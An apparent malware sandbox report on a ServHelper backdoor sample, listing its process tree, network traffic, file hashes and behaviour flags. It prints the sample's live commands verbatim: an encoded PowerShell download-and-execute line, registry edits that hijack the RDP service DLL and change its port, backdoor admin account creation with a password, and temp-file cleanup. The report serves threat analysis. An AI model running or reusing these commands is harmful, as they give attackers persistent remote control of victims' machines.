PID 1092 wrote to memory of 976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1092 wrote to memory of 3556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 3556 wrote to memory of 3968 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3556 wrote to memory of 3968 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1092 wrote to memory of 1840 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1092 wrote to memory of 1840 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 1424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 1424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 4032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 1424 wrote to memory of 4032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 4032 wrote to memory of 3984 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 4032 wrote to memory of 3984 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1092 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1092 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 2176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 2176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2176 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2808 wrote to memory of 2196 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2808 wrote to memory of 2196 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3812 wrote to memory of 568 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3812 wrote to memory of 568 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 568 wrote to memory of 740 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 568 wrote to memory of 740 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3668 wrote to memory of 3500 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3668 wrote to memory of 3500 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3500 wrote to memory of 400 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3500 wrote to memory of 400 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 976 wrote to memory of 3556 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 976 wrote to memory of 3556 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3556 wrote to memory of 3764 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3556 wrote to memory of 3764 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3604 wrote to memory of 876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3604 wrote to memory of 876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 876 wrote to memory of 2676 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 876 wrote to memory of 2676 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3444 wrote to memory of 2980 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3444 wrote to memory of 2980 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 2980 wrote to memory of 2756 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2980 wrote to memory of 2756 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3480 wrote to memory of 400 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 3480 wrote to memory of 400 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\net.exe
PID 400 wrote to memory of 4052 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 400 wrote to memory of 4052 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 4044 wrote to memory of 3912 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 4044 wrote to memory of 3912 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA841.tmp" "c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc FWXHxFTu /add

C:\Windows\system32\net.exe

net.exe user wgautilacc FWXHxFTu /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc FWXHxFTu /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc FWXHxFTu

C:\Windows\system32\net.exe

net.exe user wgautilacc FWXHxFTu

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc FWXHxFTu

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.nl-ams.llhost-inc.eu udp
NL 5.101.44.180:8080 speedtest.nl-ams.llhost-inc.eu tcp
US 8.8.8.8:53 speedtest.korton.net udp
NL 91.239.33.168:8080 speedtest.korton.net tcp
US 8.8.8.8:53 speedtest.spl.vodafone.nl udp
NL 62.140.138.205:8080 speedtest.spl.vodafone.nl tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline

MD5 755df1ce73deb575fea1a4ae46275374
SHA1 487a61f48c88b5e92df5c706077ea410a5e5cdfb
SHA256 a171aea10a12a09c4ca7ed50515b76a866d51f5d6cc5478fa690f958f0c2d1be
SHA512 611fe0199da71c20a2c4ddc9105d879fbdafe4594f3bd61521dc24c7cabbae80e5c3c62a47c7a4037eab0bbe9b71453b979e04b893a26b9d67387eb675f9975b

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP

MD5 d12b1ff3595abef1e967e7810a903ae0
SHA1 62112b3f78a7668b5fbc9d5c1e814ac4bb6b261f
SHA256 cf8f1e066b891d4fea84020d0c1b44cba113c14353e57d3a9854f848418b688b
SHA512 ef0f0e28bfe06eb2da9f19cf338562a1960f99d61cf8160dee19778c00bed650cc02a38c3b30ddc1c38e54d4c3a25dd9a3ca645c3bb72302cd7a7791f5196f18

C:\Users\Admin\AppData\Local\Temp\RESA841.tmp

MD5 dd2bd9e89f270d2cadc103665c9f48d3
SHA1 ba70dfe57ec4a7295c9c6e3bdf16e151d086c509
SHA256 213e58dda308f6e59ee98a451cf2869e67e4611521967d98a3c32b67eea65561
SHA512 3061041007dfc13ca3f658ee5fe06a2b01c759c5507dc4c3075cf2f45ab7a9d7121476e5df7fdc4243ca0620c9f7fb8082f897d0561371d30967aa7fcc147453

C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.dll

MD5 131ca5240a8c5574648dfc8239478f34
SHA1 b0150dc97e296f82881cf3ab75e52fb048f16dc4
SHA256 d6a66d935fa38011c2e25cd50d5dec88505154eadf43ec3de306047586d89746
SHA512 ff12ab0ddec4abed31d8f83ec53ee5c1c9be1ea02c89ef6ce7acf5850357cb9c9b6157d33b6242d3318766de96991614f3f49b03b109ecf92da42acde57b249d

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 18:54

Reported

2021-09-24 18:56

Platform

win7-en-20210920

Max time kernel

147s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QGVL9753X1SCJ6GRIAKH.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 8005d2a775b1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
